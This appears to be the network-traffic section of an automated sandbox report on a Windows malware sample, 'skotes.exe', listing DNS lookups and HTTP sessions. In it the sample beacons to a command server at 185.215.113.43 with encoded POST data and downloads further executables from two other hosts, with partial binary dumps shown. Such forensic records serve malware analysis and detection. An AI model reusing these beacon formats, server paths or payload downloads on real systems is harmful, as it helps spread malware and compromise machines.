Nov 4, 2024 17:37:19.154371023 CET	1.1.1.1	192.168.2.5	0x5848	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:37:19.154371023 CET	1.1.1.1	192.168.2.5	0x5848	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:19.254535913 CET	1.1.1.1	192.168.2.5	0x38f8	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:37:19.254535913 CET	1.1.1.1	192.168.2.5	0x38f8	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:19.273087978 CET	1.1.1.1	192.168.2.5	0xde4a	No error (0)	shavar.services.mozilla.com	shavar.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:37:19.274852991 CET	1.1.1.1	192.168.2.5	0x609e	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:19.328318119 CET	1.1.1.1	192.168.2.5	0x8f3e	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:19.335969925 CET	1.1.1.1	192.168.2.5	0x8adf	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:19.385971069 CET	1.1.1.1	192.168.2.5	0x37bf	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.412663937 CET	1.1.1.1	192.168.2.5	0x55f9	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:37:22.412663937 CET	1.1.1.1	192.168.2.5	0x55f9	No error (0)	youtube-ui.l.google.com		142.250.185.206	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.412663937 CET	1.1.1.1	192.168.2.5	0x55f9	No error (0)	youtube-ui.l.google.com		142.250.186.78	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.412663937 CET	1.1.1.1	192.168.2.5	0x55f9	No error (0)	youtube-ui.l.google.com		216.58.206.46	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.412663937 CET	1.1.1.1	192.168.2.5	0x55f9	No error (0)	youtube-ui.l.google.com		142.250.185.238	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.412663937 CET	1.1.1.1	192.168.2.5	0x55f9	No error (0)	youtube-ui.l.google.com		142.250.184.206	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.412663937 CET	1.1.1.1	192.168.2.5	0x55f9	No error (0)	youtube-ui.l.google.com		216.58.206.78	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.412663937 CET	1.1.1.1	192.168.2.5	0x55f9	No error (0)	youtube-ui.l.google.com		172.217.23.110	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.412663937 CET	1.1.1.1	192.168.2.5	0x55f9	No error (0)	youtube-ui.l.google.com		142.250.185.78	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.412663937 CET	1.1.1.1	192.168.2.5	0x55f9	No error (0)	youtube-ui.l.google.com		142.250.185.174	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.412663937 CET	1.1.1.1	192.168.2.5	0x55f9	No error (0)	youtube-ui.l.google.com		142.250.186.46	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.412663937 CET	1.1.1.1	192.168.2.5	0x55f9	No error (0)	youtube-ui.l.google.com		142.250.181.238	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.412663937 CET	1.1.1.1	192.168.2.5	0x55f9	No error (0)	youtube-ui.l.google.com		142.250.74.206	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.412663937 CET	1.1.1.1	192.168.2.5	0x55f9	No error (0)	youtube-ui.l.google.com		142.250.185.110	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.412663937 CET	1.1.1.1	192.168.2.5	0x55f9	No error (0)	youtube-ui.l.google.com		142.250.186.174	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.412663937 CET	1.1.1.1	192.168.2.5	0x55f9	No error (0)	youtube-ui.l.google.com		172.217.18.110	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.412663937 CET	1.1.1.1	192.168.2.5	0x55f9	No error (0)	youtube-ui.l.google.com		142.250.185.142	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.412858963 CET	1.1.1.1	192.168.2.5	0x1315	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:37:22.412858963 CET	1.1.1.1	192.168.2.5	0x1315	No error (0)	star-mini.c10r.facebook.com		157.240.251.35	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.412869930 CET	1.1.1.1	192.168.2.5	0x9a45	No error (0)	www.wikipedia.org	dyna.wikimedia.org		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:37:22.412869930 CET	1.1.1.1	192.168.2.5	0x9a45	No error (0)	dyna.wikimedia.org		185.15.59.224	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.430207014 CET	1.1.1.1	192.168.2.5	0xe53	No error (0)	star-mini.c10r.facebook.com		157.240.251.35	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.430917978 CET	1.1.1.1	192.168.2.5	0x6619	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Nov 4, 2024 17:37:22.430917978 CET	1.1.1.1	192.168.2.5	0x6619	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Nov 4, 2024 17:37:22.430917978 CET	1.1.1.1	192.168.2.5	0x6619	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Nov 4, 2024 17:37:22.430917978 CET	1.1.1.1	192.168.2.5	0x6619	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Nov 4, 2024 17:37:22.431473970 CET	1.1.1.1	192.168.2.5	0xdc0c	No error (0)	dyna.wikimedia.org		185.15.59.224	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.447201967 CET	1.1.1.1	192.168.2.5	0x7920	No error (0)	star-mini.c10r.facebook.com			28	IN (0x0001)	false
Nov 4, 2024 17:37:22.448230982 CET	1.1.1.1	192.168.2.5	0x6848	No error (0)	www.reddit.com	reddit.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:37:22.448230982 CET	1.1.1.1	192.168.2.5	0x6848	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.448230982 CET	1.1.1.1	192.168.2.5	0x6848	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.448230982 CET	1.1.1.1	192.168.2.5	0x6848	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.448230982 CET	1.1.1.1	192.168.2.5	0x6848	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.467298985 CET	1.1.1.1	192.168.2.5	0x9091	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.467298985 CET	1.1.1.1	192.168.2.5	0x9091	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.467298985 CET	1.1.1.1	192.168.2.5	0x9091	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.467298985 CET	1.1.1.1	192.168.2.5	0x9091	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:23.944252968 CET	1.1.1.1	192.168.2.5	0x9e0a	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:39.577871084 CET	1.1.1.1	192.168.2.5	0x4561	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:37:39.577871084 CET	1.1.1.1	192.168.2.5	0x4561	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:56.692626953 CET	1.1.1.1	192.168.2.5	0x228	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:38:18.733709097 CET	1.1.1.1	192.168.2.5	0xa1ed	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:38:18.733997107 CET	1.1.1.1	192.168.2.5	0xa1ed	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:38:37.945754051 CET	1.1.1.1	192.168.2.5	0xd115	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:38:38.602852106 CET	1.1.1.1	192.168.2.5	0x68c2	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:38:38.602852106 CET	1.1.1.1	192.168.2.5	0x68c2	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:39:58.752939939 CET	1.1.1.1	192.168.2.5	0x6f99	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:39:58.766313076 CET	1.1.1.1	192.168.2.5	0x32c7	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:39:59.415463924 CET	1.1.1.1	192.168.2.5	0xd014	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:39:59.415463924 CET	1.1.1.1	192.168.2.5	0xd014	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:40:20.230041981 CET	1.1.1.1	192.168.2.5	0xcdad	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49925	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:32:03.054347038 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:32:03.982312918 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:32:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49940	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:32:05.498366117 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:32:06.419445038 CET	646	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:32:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 63 37 0d 0a 20 3c 63 3e 31 30 30 33 38 39 35 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 62 37 36 38 31 34 65 35 66 65 63 30 30 61 61 34 39 35 63 34 39 23 31 30 30 33 38 39 36 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 33 38 39 37 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 30 33 38 39 38 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 [TRUNCATED] Data Ascii: 1c7 <c>1003895001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbdb76814e5fec00aa495c49#1003896001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1003897001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1003898001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1003899001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49946	31.41.244.11	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:32:06.428457022 CET	55	OUT	GET /files/pisos23.exe HTTP/1.1 Host: 31.41.244.11
Nov 4, 2024 17:32:07.341176987 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:32:07 GMT Content-Type: application/octet-stream Content-Length: 1192960 Last-Modified: Mon, 04 Nov 2024 16:18:36 GMT Connection: keep-alive ETag: "6728f3dc-123400" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 08 00 73 b3 28 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 5c 0c 00 00 10 01 00 00 00 00 00 40 22 0b 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 12 00 00 06 00 00 00 00 00 00 03 00 40 c3 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 ee 0c 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0d 00 28 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b8 0c 00 18 00 00 00 40 84 0c 00 c0 00 00 00 00 00 00 00 00 00 00 00 f0 ef [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELs(g\@"@@T((Px@t.text[\ `.rdatalpb@@.dataI$@.05cfg`@@.ondatp@.tls@.reloc(PR @B.pdatar
Nov 4, 2024 17:32:07.341191053 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:32:07.341202974 CET	424	IN	Data Raw: a4 f7 d1 81 e1 2b b8 2e 5b 09 ca 89 d1 81 f2 2a b8 2e 5b 81 f1 d4 47 d1 a4 83 e1 fe 09 ca 89 d1 81 e2 b6 90 4f b0 f7 d1 81 e1 49 6f b0 4f 09 ca 81 f2 b6 90 4f b0 0f 94 c1 0f 95 c2 83 f8 09 0f 9f c5 83 f8 0a 0f 9c c0 20 e9 20 d0 08 c1 88 e8 30 d5 Data Ascii: +.[*.[GOIoOO 0 0E6=.=Oy}u=e6=_=f=hEJUZ=P==7u=yc
Nov 4, 2024 17:32:07.341353893 CET	1236	IN	Data Raw: 8e 6d 03 00 00 3d 34 ac 8a 59 0f 8e 4b 06 00 00 3d 33 31 fc 5a 0f 8e 2f 10 00 00 3d 1e 91 04 5c 0f 8f ff 15 00 00 3d 34 31 fc 5a 0f 84 56 36 00 00 3d e4 8c 06 5b 0f 85 a1 fb ff ff 8b 8d d8 fe ff ff e8 a6 44 00 00 b8 51 8c 70 3b 3d f2 18 e4 ee 0f Data Ascii: m=4YK=31Z/=\=41ZV6=[DQp;=!=F=Jy=]rG= v=^r6=@~?.9=:=0==R=5=.,
Nov 4, 2024 17:32:07.341370106 CET	212	IN	Data Raw: a5 f7 ff ff 3d c3 9f 5d 4e 0f 8f 0a 06 00 00 3d 74 56 17 48 0f 84 d7 19 00 00 3d 36 d1 7f 4c 0f 84 ed 15 00 00 3d 80 b5 fc 4d 0f 85 d9 f6 ff ff 8b 45 d8 40 89 45 bc b8 62 30 24 ef 3d f2 18 e4 ee 0f 8e cd f6 ff ff e9 5d f7 ff ff 3d a6 b6 ce 91 0f Data Ascii: =]N=tVH=6L=ME@Eb0$=]=}=^=u=UkEEd"'=wMn =G~=E=@GL`\
Nov 4, 2024 17:32:07.341411114 CET	1236	IN	Data Raw: ff ff ff 8a 00 88 85 67 ff ff ff b8 56 5c 0e 9c 3d f2 18 e4 ee 0f 8e 25 f6 ff ff e9 b5 f6 ff ff 3d 67 42 1e 02 0f 8f f9 06 00 00 3d a4 fe cc fc 0f 84 c5 1e 00 00 3d 98 61 29 ff 0f 84 54 19 00 00 3d 85 c5 c8 ff 0f 85 e9 f5 ff ff a1 bc 32 4d 00 be Data Ascii: gV\=%=gB==a)T=2Mb5sH[v%u~u~5Zv=2M0 0sED&=t0T=\NQM=0XQ=RVm=Q
Nov 4, 2024 17:32:07.341480970 CET	1236	IN	Data Raw: 0f 94 c1 0f 95 c2 83 f8 09 0f 9f c5 83 f8 0a 0f 9c c0 20 cd 88 c4 30 d4 20 c4 20 d0 08 e8 88 e1 30 c1 b9 08 86 04 64 0f 45 ce 84 c0 89 ca 0f 45 d6 84 e4 0f 44 d1 e9 c6 21 00 00 3d db b6 c2 f7 0f 84 38 16 00 00 3d 8a c5 0a fa 0f 84 35 11 00 00 3d Data Ascii: 0 0dEED!=8=5=,4^ ==]N=[IPy=P2MeHEt'Dt'1=2M00 0E
Nov 4, 2024 17:32:07.341495991 CET	424	IN	Data Raw: 5c 0e 9c 0f 85 84 ec ff ff 0f b6 85 67 ff ff ff 89 85 68 ff ff ff b8 09 21 6f cd 3d f2 18 e4 ee 0f 8e 72 ec ff ff e9 02 ed ff ff 3d b5 2e 34 c8 0f 84 78 1b 00 00 3d 9e 2c 2d c9 0f 84 88 1b 00 00 3d 12 5a a4 ca 0f 85 41 ec ff ff b8 4e a3 b9 e5 3d Data Ascii: \gh!o=r=.4x=,-=ZAN=<=7u=g=2M2MPlucj( muc 0ct0EctE
Nov 4, 2024 17:32:07.341515064 CET	1236	IN	Data Raw: 95 97 14 35 48 6a 68 eb 83 e0 fe 09 c2 83 fa ff 0f 94 c0 0f 95 c2 83 f9 0a 0f 9c c4 83 f9 09 0f 9f c1 30 d1 88 e2 08 c4 30 c2 80 f4 01 08 d4 ba 0a 6a 3e b1 88 e0 30 c8 0f 45 d6 84 e4 b8 0a 6a 3e b1 e9 23 24 00 00 3d f6 71 7c a9 0f 84 fb 21 00 00 Data Ascii: 5Hjh00j>0Ej>#$=q\|!==I}v}V@_EEE=j=]!=D=G32M2MPpm:**%#ct
Nov 4, 2024 17:32:07.341526031 CET	1236	IN	Data Raw: 0e 09 41 0f 95 c0 83 3d c0 32 4d 00 09 0f 9f c1 89 ca 30 c1 08 c2 89 d0 30 c8 b8 d8 87 58 ce 0f 45 f0 84 c9 b9 b1 5e c4 86 e9 95 1e 00 00 3d c4 19 da 15 0f 84 2e 21 00 00 3d 78 0b dc 15 0f 85 cd e5 ff ff b8 5d b9 85 39 3d f2 18 e4 ee 0f 8e c8 e5 Data Ascii: A=2M00XE^=.!=x]9=X=\v!=yeW\2At=!=Sa!=d^k}\NE=^=]Si*M!=}s+8-NEd^=
Nov 4, 2024 17:32:07.346261978 CET	1236	IN	Data Raw: 9f c4 83 f9 0a 0f 9c c1 30 d1 88 e2 30 c4 20 c2 08 d4 ba 67 51 1f 2f 88 e0 30 c8 84 e4 0f 45 d6 84 c9 0f 44 d6 84 c0 b8 67 51 1f 2f e9 8f 0c 00 00 b8 d8 d2 88 f1 3d f2 18 e4 ee 0f 8e 07 e1 ff ff e9 97 e1 ff ff 50 83 ec 08 89 e0 89 85 d8 fe ff ff Data Ascii: 00 gQ/0EDgQ/=Pq\|=v2M2MPf?}E \|E 0 h2M2MPU=P

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49984	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:32:13.950572014 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 33 38 39 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003895001&unit=246122658369
Nov 4, 2024 17:32:14.843691111 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:32:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49990	185.215.113.16	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:32:14.852221012 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 4, 2024 17:32:15.769736052 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:32:15 GMT Content-Type: application/octet-stream Content-Length: 2977792 Last-Modified: Mon, 04 Nov 2024 16:30:26 GMT Connection: keep-alive ETag: "6728f6a2-2d7000" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 80 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 30 00 00 04 00 00 71 94 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELSgJ0@0q-@Th@ ~@.rsrc@@.idata @vorbeozz**@fvzeyeuip0J-@.taggant00"N-@
Nov 4, 2024 17:32:15.769763947 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:32:15.769779921 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:32:15.769793034 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:32:15.769814968 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:32:15.769876003 CET	1236	IN	Data Raw: 28 4d 45 56 98 50 22 f4 1c 8f 96 db 1e fa 08 e3 28 82 47 17 41 c6 61 aa 0e 82 27 6c dc 16 e1 fe d8 8b 25 fe 15 0a e0 31 3e 93 57 cd 36 7c ff d0 12 6f ee 63 41 94 3f 4b d5 f4 d8 5f 50 87 7d cd 32 f5 66 58 c2 9d 2b 7d 53 6e 77 05 cf 2d f0 13 05 11 Data Ascii: (MEVP"(GAa'l%1>W6\|ocA?K_P}2fX+}Snw-U&XJdBPfOor?k`n^jnMUN=4}#*\|SFw.'3'ok}^y$LvA2+{a.&4^/x
